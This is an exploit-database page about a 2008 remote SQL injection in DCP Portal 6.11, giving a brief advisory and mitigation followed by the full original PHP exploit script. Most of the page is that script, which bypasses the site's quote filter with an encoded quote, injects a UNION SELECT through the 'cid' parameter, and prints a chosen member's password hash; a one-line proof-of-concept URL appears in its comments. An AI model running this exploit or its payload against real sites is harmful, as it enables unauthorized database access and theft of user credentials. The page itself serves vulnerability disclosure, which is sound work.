DCP Portal - exploit.company

vendor:

DCP Portal

by:

x0kster

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: DCP Portal

Affected Version From: 6.11

Affected Version To: 6.11

Patch Exists: YES

Related CWE: N/A

CPE: a:dcp-portal:dcp_portal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

DCP Portal <= 6.11 Remote SQL Injection Exploit

DCP Portal version 6.11 is vulnerable to a remote SQL injection vulnerability. This vulnerability is due to the lack of proper sanitization of user-supplied input to the 'cid' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The exploit code uses the '%27' character to bypass the filter and inject malicious SQL code into the query.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/php -q
<?php
echo "[*]DCP Portal <= 6.11 Remote SQL Injection Exploit\r\n";
echo "[*]Coded by x0kster -x0kster[AT]gmail[DOT]com - \r\n";
/*
Note : Magic Quotes = 0
Script Download : http://www.dcp-portal.org/

Bug in index.php :

     <?php
     //index.php
     [...]
 60.  $sql = "SELECT id, name FROM $t_cats WHERE cat_id = '".$_GET["cid"]."' ORDER BY sort, name";
     [...]
     ?>
     
But the script filter the quotes with this code, included in each page of the cms:
   
     <?php
     //config/config.inc.php
     [...]
118.  if (strlen($_SERVER['QUERY_STRING']) > 0) {  
119.  $str = $_SERVER['QUERY_STRING'];  
120.  $arr = split('[;&]', URLdecode($str));  
121.  $pos = strpos($str, "'");  
122.  if ($pos) {    
123.  $hackattempt = true;  }  
     [...]
     ?>
     
But we can bypass this control using %27 instead ' :-).

So this is the simple PoC:
http://site/path/index.php?cid=-1%27+union+select+1,password+from+dcp5_members+where+uid=1/*
 
Exploit :
*/
if ($argc<4) {
 echo "[*]Usage: php ".$argv[0]." host path id\r\n";
 echo "[*]Example:\r\n";
 echo "[*]php ".$argv[0]." localhost /dcp-portal/ 1\r\n";
 die;
}

function get_response($packet){
 global $host, $response;
 $socket=fsockopen(gethostbyname($host),80);
 if (!$socket) { echo "[-]Error contacting $host.\r\n"; exit();}
 fputs($socket,$packet);
 $response='';
 while (!feof($socket)) {
  $response.=fgets($socket);
    }
 fclose($socket);
}

$host =$argv[1];
$path =$argv[2];
$id = $argv[3];
 
$packet ="GET ".$path."index.php?cid=-1%27+union+select+1,concat(0x78306b73746572,password,0x78306b73746572)+from+dcp5_members+where+uid=".$id."/*";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";

get_response($packet);
if(strstr($response,"x0kster")){
	$hash = explode("x0kster",$response,32);
	echo "[+]Ok, the hash is : $hash[1]\r\n";
	die;
}else{
	echo "[-]Exploit filed, maybe fixed or incorrect id.\r\n";
	die;
}    

?>

# milw0rm.com [2008-01-06]